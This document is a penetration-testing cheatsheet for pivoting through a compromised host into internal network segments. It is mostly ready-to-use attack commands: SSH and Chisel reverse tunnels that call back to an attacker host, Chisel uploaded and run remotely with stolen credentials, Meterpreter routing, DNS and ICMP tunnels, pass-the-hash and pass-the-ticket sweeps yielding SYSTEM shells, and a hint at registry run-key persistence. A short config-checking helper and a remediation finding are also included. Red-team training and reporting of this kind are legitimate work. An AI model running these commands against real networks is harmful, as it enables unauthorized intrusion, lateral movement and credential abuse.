🛡️ Methodology Checklist
- Identify pivot host: dual-homed, domain-joined bridging two segments
- Choose method: SSH -D (Linux+SSH) / Chisel (Windows pivot) / MSF autoroute (existing session)
- Verify tunnel: netstat -lnpt | grep [SOCKS_PORT]
- Configure Proxychains: socks5 127.0.0.1 [SOCKS_PORT] in /etc/proxychains.conf
- Validate connectivity: proxychains4 -q curl http://[INTERNAL_IP]
- Pass-the-Hash / PtT across tunnel to internal targets
- Clean up all tunnel processes and relay processes on exit
🎯 Operational Context
Use when: Internal network pivoting required — master reference for all tunneling and pivoting methods organized by scenario.
Think Dumber First: Identify: what OS is the pivot? What tools are available? What protocol is egress? Then select the appropriate section of this cheatsheet. Match the tool to the scenario, not the scenario to a preferred tool.
Skip when: N/A — master reference document.
⚡ Tactical Cheatsheet
SSH Tunneling
| Command | Tactical Outcome |
|---|---|
| ssh -D 9050 [USER]@[PIVOT_IP] | Dynamic SOCKS proxy on port 9050 |
| ssh -L [LPORT]:[INTERNAL_IP]:[RPORT] [USER]@[PIVOT_IP] | Local port forward (single service) |
| ssh -R [RPORT]:localhost:[LPORT] [USER]@[ATTACKER_IP] | Remote tunnel (pivot calls back) |
| ssh -N -f -D 9050 [USER]@[PIVOT_IP] | Background silent SOCKS proxy |
| ss -tlnp \| grep 9050 | Verify SOCKS listener |
Chisel (Reverse SOCKS)
| Command | Tactical Outcome |
|---|---|
| ./chisel server --reverse | Attacker: start Chisel server (listens :8080) |
| nxc smb [PIVOT] -u [USER] -p [PASS] --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe | Upload Chisel to Windows pivot |
| nxc smb [PIVOT] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks" | Pivot connects back → SOCKS on attacker :1080 |
| netstat -lnpt \| grep 1080 | Verify SOCKS tunnel is active |
| nxc smb [PIVOT] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force" | Kill Chisel on pivot (cleanup) |
Meterpreter Autoroute
| Command | Tactical Outcome |
|---|---|
| run post/multi/manage/autoroute SUBNET=[INTERNAL_NET] NETMASK=255.255.255.0 | Add route through Meterpreter session |
| use auxiliary/server/socks_proxy; set SRVPORT 1080; set VERSION 5; run | Start SOCKS5 proxy in MSF |
| portfwd add -l [LPORT] -p [RPORT] -r [INTERNAL_IP] | Single port forward via Meterpreter |
| run post/multi/gather/arp_scanner RHOSTS=[INTERNAL_NET]/24 | Internal ARP discovery |
Socat Relay
| Command | Tactical Outcome |
|---|---|
| socat TCP-LISTEN:[PORT],fork TCP:[DEST_IP]:[DEST_PORT] | TCP relay on pivot host |
| socat UDP-LISTEN:[PORT],fork UDP:[DEST_IP]:[DEST_PORT] | UDP relay |
Proxychains Usage
| Command | Tactical Outcome |
|---|---|
| proxychains4 -q nxc smb [INTERNAL_IP] -u [USER] -p [PASS] --shares | NXC through SOCKS tunnel |
| proxychains4 -q nmap -sT -Pn -p 22,80,445,3389 [INTERNAL_IP] | Nmap through tunnel (TCP only) |
| proxychains4 -q impacket-psexec [DOMAIN]/[USER]@[INTERNAL_IP] -hashes :[HASH] | Impacket PtH through tunnel |
| proxychains4 -q evil-winrm -i [INTERNAL_IP] -u [USER] -p [PASS] | WinRM through tunnel |
| proxychains4 -q ssh [USER]@[INTERNAL_IP] | SSH hop through tunnel |
Pass-the-Hash / Pass-the-Ticket
| Command | Tactical Outcome |
|---|---|
| nxc smb [SUBNET]/24 -u [USER] -H [NTLM_HASH] --local-auth | PtH subnet sweep |
| impacket-psexec [DOMAIN]/[USER]@[TARGET] -hashes :[NTLM_HASH] | PtH → SYSTEM shell |
| evil-winrm -i [TARGET] -u [USER] -H [NTLM_HASH] | PtH → WinRM shell |
| export KRB5CCNAME=/path/to/ticket.ccache; impacket-psexec -k -no-pass [DOMAIN]/[USER]@[TARGET] | Pass-the-Ticket (Linux) |
| Rubeus.exe ptt /ticket:[BASE64]; klist | Pass-the-Ticket (Windows) |
netsh Portproxy
| Command | Tactical Outcome |
|---|---|
| netsh interface portproxy add v4tov4 localport=[LPORT] connectaddress=[DEST] connectport=[DPORT] | Windows port proxy |
| netsh interface portproxy show all | List active proxies |
| netsh interface portproxy delete v4tov4 localport=[LPORT] | Remove proxy |
Protocol Tunneling
| Command | Tactical Outcome |
|---|---|
| dnscat2 --dns server=[ATTACKER],port=53,domain=[DOMAIN] | DNS tunnel client on pivot |
| ptunnel -p [ATTACKER] -lp [LPORT] -da [INTERNAL_IP] -dp [DPORT] | ICMP tunnel |
| python client.py --server-ip [ATTACKER] --server-port 9999 | rpivot HTTP tunnel client |
🔬 Deep Dive & Workflow
Tunnel Method Decision Matrix
| Pivot OS | Tool Available | Best Method |
|---|---|---|
| Linux | SSH access | ssh -D 9050 (dynamic SOCKS) |
| Windows | No SSH | Chisel reverse SOCKS |
| Any | MSF session | autoroute + socks_proxy |
| Windows | No binaries | netsh interface portproxy |
| Any | DNS only egress | dnscat2 |
| Any | ICMP only | ptunnel |
Proxychains Config Check
# Verify /etc/proxychains.conf
grep -A5 "\[ProxyList\]" /etc/proxychains.conf
# Must show: socks5 127.0.0.1 [SOCKS_PORT]
# NOT socks4 — many tools fail with socks4
# Quick fix if wrong: replace the old ProxyList entry rather than appending to it
# (appending leaves two proxies in the chain, which fails under strict_chain)
sed -i '/^socks[45] 127.0.0.1 /d' /etc/proxychains.conf && echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
Full Chisel Pivot Workflow
# ATTACKER SETUP
# -O names each download so the gunzip and upload steps below refer to files that exist
wget -q -O chisel_linux.gz https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
gunzip chisel_linux.gz && chmod +x chisel_linux
wget -q -O chisel_windows.exe.gz .../chisel_1.7.7_windows_amd64.gz && gunzip chisel_windows.exe.gz
./chisel_linux server --reverse # listens on :8080
# UPLOAD + CONNECT (via NXC)
nxc smb [PIVOT] -u [USER] -p [PASS] --put-file ./chisel_windows.exe \\Windows\\Temp\\chisel.exe
nxc smb [PIVOT] -u [USER] -p [PASS] -x "C:\Windows\Temp\chisel.exe client [LHOST]:8080 R:socks"
# VERIFY + USE
netstat -lnpt | grep 1080 # should show 127.0.0.1:1080 LISTEN
proxychains4 -q nxc smb [INTERNAL] -u [USER] -p [PASS] --shares
# CLEANUP
nxc smb [PIVOT] -u [USER] -p [PASS] -X "Stop-Process -Name chisel -Force"
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Tunnel established but traffic not routing | Route missing | Verify route: proxychains4 curl http://[INTERNAL_IP]; add route if needed |
| Proxychains config stale | Old SOCKS port in config | Always verify /etc/proxychains.conf matches current tunnel port before use |
| Multiple pivots needed | Two-hop scenario | Chain: SSH -D through first pivot → proxychains SSH -D through second → proxychains4 tools on attack box |
| Pivot host rebooted | Lost tunnel | Re-establish in same order; consider cron job or registry run key to auto-restart tunnel agent |
| VPN drops mid-pivot | HTB infrastructure | Re-establish VPN first; tunnels route through VPN; then re-establish tunnel session |
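The Proxychains Config Check above and the "Proxychains config stale" row both reduce to one question: does the ProxyList entry name socks5 and point at a loopback port that is actually listening? This added example (not part of the original cheatsheet) answers it by parsing ss -tlnp output and a proxychains.conf; both inputs are constructed samples, and the same listener parser serves a host audit for unexpected loopback SOCKS agents.

```python
# Added example: cross-check a proxychains ProxyList against live loopback listeners.
import re

# Constructed `ss -tlnp` sample: chisel reverse SOCKS on 127.0.0.1:1080, sshd on :22, no ssh -D on 9050.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      4096   127.0.0.1:1080     0.0.0.0:*         users:(("chisel",pid=4311,fd=8))
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=811,fd=3))
"""

# Constructed stale /etc/proxychains.conf: socks4 on the old port 9050.
STALE_CONF = """\
strict_chain
[ProxyList]
socks4 127.0.0.1 9050
"""

def socks_listeners(ss_text):
    """Map loopback LISTEN port -> owning process name, parsed from `ss -tlnp` output."""
    found = {}
    for line in ss_text.splitlines():
        m = re.search(r'^LISTEN\s+\S+\s+\S+\s+127\.0\.0\.1:(\d+)\s.*?\(\("([^"]+)"', line)
        if m:
            found[int(m.group(1))] = m.group(2)
    return found

def proxylist(conf_text):
    """Return (scheme, host, port) tuples under [ProxyList], skipping comments and blanks."""
    entries, in_list = [], False
    for line in conf_text.splitlines():
        line = line.split('#', 1)[0].strip()
        if not line:
            continue
        if line.startswith('['):          # a section header switches context
            in_list = (line == '[ProxyList]')
            continue
        if in_list:
            scheme, host, port = line.split()[:3]
            entries.append((scheme, host, int(port)))
    return entries

def check(conf_text, ss_text):
    """List problems; an empty list means every entry is socks5 with a live loopback listener."""
    problems, live = [], socks_listeners(ss_text)
    for scheme, host, port in proxylist(conf_text):
        if scheme != 'socks5':
            problems.append(f'{scheme} entry on {port}: use socks5, many tools fail on socks4')
        if host == '127.0.0.1' and port not in live:
            problems.append(f'no listener on 127.0.0.1:{port}; live loopback ports: {sorted(live)}')
    return problems
```

On a real box, feed check() the contents of /etc/proxychains.conf and the output of ss -tlnp; two problems are reported for the constructed samples, none once the entry reads socks5 127.0.0.1 1080.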
📝 Reporting Trigger
Finding Title: Network Segmentation Bypassed via Multi-Hop Pivot Chain
Impact: Chained pivot through multiple compromised hosts reaches target segments separated by multiple network boundaries, demonstrating that network segmentation is ineffective without complementary controls on individual hosts.
Root Cause: Network segmentation implemented without host-level controls preventing compromised hosts from bridging security zones.
Recommendation: Implement zero-trust network architecture. Add host-based firewall rules restricting inter-segment connectivity regardless of network-level controls. Monitor for proxy traffic patterns on all internal hosts.